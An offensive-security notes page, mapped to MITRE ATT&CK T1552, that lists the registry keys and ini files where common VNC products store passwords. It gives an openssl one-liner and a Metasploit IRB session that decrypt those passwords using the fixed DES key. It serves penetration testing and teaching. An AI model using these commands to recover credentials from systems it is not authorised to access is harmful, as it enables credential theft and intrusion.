VNC Config

MITRE ATT&CK™ Unsecured Credentials: Credentials In Files - Technique T1552.00

Theory

VNC clients uses a hardcoded DES key to store credentials. If you have access to a VNC config file you may be able to decrypt it as the same key is used across multiple product lines.

Practice

On Windows systems, you may find the VNC password in the following files.

VNC Client

Config File

Password

RealVNC

HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\vncserver

Value: Password

TightVNC

HKEY_CURRENT_USER\Software\TightVNC\Server

HKLM\SOFTWARE\TightVNC\Server\ControlPassword

tightvnc.ini

vnc_viewer.ini

Value: Password or PasswordViewOnly

TigerVNC

HKEY_LOCAL_USER\Software\TigerVNC\WinVNC4

Value: Password

UltraVNC

C:\Program Files\UltraVNC\ultravnc.ini

Value: passwd or passwd2

Once you have extracted the hexadecimal-encoded password, we can decrypt it using only native Linux tools

echo -n <HEX_PASSWORD> | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv

Msfconsole can also be used to decrypt the password as follows (example with key 17526b06234e5807)

$> msfconsole

msf5 > irb
[*] Starting IRB shell...
[*] You are in the "framework" object

>> fixedkey = "\x17\x52\x6b\x06\x23\x4e\x58\x07"
 => "\u0017Rk\u0006#NX\a"
>> require 'rex/proto/rfb'
 => true
>> Rex::Proto::RFB::Cipher.decrypt ["D7A514D8C556AADE"].pack('H*'), fixedkey
 => "Secure!\x00"
>>

Resources

https://notes.offsec-journey.com/enumeration/vncnotes.offsec-journey.com

GitHub - frizb/PasswordDecrypts: Handy Stored Password Decryption TechniquesGitHub

Last updated 4 months ago

Was this helpful?